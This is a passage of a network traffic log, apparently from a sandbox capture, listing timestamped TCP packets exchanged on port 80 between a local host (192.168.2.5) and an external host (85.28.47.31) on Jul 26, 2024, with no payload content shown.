Jul 26, 2024 20:09:10.133424997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.133436918 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.133459091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.133475065 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.133505106 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.134227037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.134262085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.134289980 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.134295940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.134309053 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.134330988 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.134337902 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.134362936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.134377003 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.134396076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.134407043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.134443998 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.135138988 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.135174036 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.135201931 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.135205984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.135216951 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.135238886 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.135257006 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.135272026 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.135281086 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.135304928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.135315895 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.135337114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.135354042 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.135381937 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.136075974 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.136110067 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.136137009 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.136142969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.136152983 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.136177063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.136193991 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.136210918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.136223078 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.136266947 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.136991024 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.137026072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.137053967 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.137054920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.137073994 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.137088060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.137101889 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.137217999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.137245893 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.137250900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.137264967 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.137285948 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.137300014 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.137331009 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.137701988 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.137753010 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.137758970 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.137785912 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.137799978 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.137820005 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.137835979 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.137851000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.137864113 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.137883902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.137900114 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.137912989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.137928963 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.137945890 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.137957096 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.137999058 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.138647079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.138684034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.138710022 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.138716936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.138726950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.138750076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.138767004 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.138782978 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.138792992 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.138818026 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.138827085 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.138866901 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.139548063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.139581919 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.139611959 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.139612913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.139628887 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.139648914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.139657021 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.139682055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.139694929 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.139714956 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.139729977 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.139746904 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.139761925 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.139781952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.139792919 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.139830112 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.140419960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.140455008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.140500069 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.140533924 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.140564919 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.140599012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.140611887 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.140634060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.140660048 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.140666962 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.140680075 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.140719891 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.141323090 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.141356945 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.141388893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.141390085 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.141417027 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.141422987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.141434908 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.141457081 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.141474009 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.141489983 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.141503096 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.141524076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.141534090 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.141556978 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.141585112 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.141602993 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.142225981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.142260075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.142285109 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.142296076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.142307043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.142329931 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.142342091 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.142360926 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.142385006 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.142393112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.142404079 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.142426968 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.142442942 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.142472029 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.143109083 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.143142939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.143171072 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.143177032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.143187046 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.143209934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.143220901 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.143243074 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.143259048 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.143276930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.143287897 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.143310070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.143323898 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.143353939 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.143917084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.143950939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.143981934 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.144015074 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.516369104 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.516396046 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.516412020 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.516546011 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.516546011 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.516705036 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.516721964 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.516737938 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.516752958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.516758919 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.516768932 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.516794920 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.516841888 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.517307997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.517326117 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.517364025 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.517389059 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.517587900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.517601967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.517616034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.517631054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.517637968 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.517648935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.517659903 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.517664909 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.517687082 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.517715931 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.518517017 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.518532038 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.518548012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.518563032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.518573999 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.518577099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.518594027 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.518600941 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.518606901 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.518615961 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.518649101 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.519427061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.519443989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.519458055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.519473076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.519488096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.519504070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.519510031 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.519510031 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.519520998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.519542933 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.519542933 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.519577026 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.520344973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.520360947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.520375967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.520390987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.520399094 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.520406008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.520420074 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.520423889 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.520437956 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.520450115 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.520468950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.520509005 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.521259069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.521276951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.521291018 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.521306038 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.521321058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.521330118 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.521337032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.521347046 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.521352053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.521367073 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.521390915 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.522114992 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.522130013 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.522144079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.522165060 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.522166967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.522181988 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.522185087 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.522197008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.522222996 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.522267103 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.523078918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.523092985 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.523108006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.523123026 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.523125887 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.523137093 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.523147106 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.523153067 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.523166895 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.523169041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.523188114 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.523205996 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.524017096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.524033070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.524045944 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.524060965 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.524066925 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.524076939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.524092913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.524097919 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.524108887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.524117947 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.524137974 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.524161100 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.524760008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.524775982 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.524791002 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.524806023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.524812937 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.524821043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.524837017 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.524840117 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.524840117 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.524849892 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.524859905 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.524866104 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.524882078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.524887085 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.524897099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.524907112 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.524926901 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.524950027 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.525713921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.525728941 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.525744915 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.525759935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.525764942 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.525774002 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.525789022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.525793076 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.525793076 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.525803089 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.525813103 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.525818110 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.525832891 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.525856972 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.526592970 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.526608944 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.526624918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.526639938 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.526647091 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.526654959 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.526670933 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.526671886 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.526686907 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.526700020 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.526710987 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.526710987 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.526714087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.526736975 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.526760101 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.527576923 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.527591944 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.527605057 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.527620077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.527626038 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.527637005 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.527647018 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.527652025 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.527667046 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.527674913 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.527682066 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.527694941 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.527698994 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.527714014 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.527720928 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.527738094 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.527761936 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.528563976 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.528579950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.528594017 CEST	80	49704	85.28.47.31	192.168.2.5
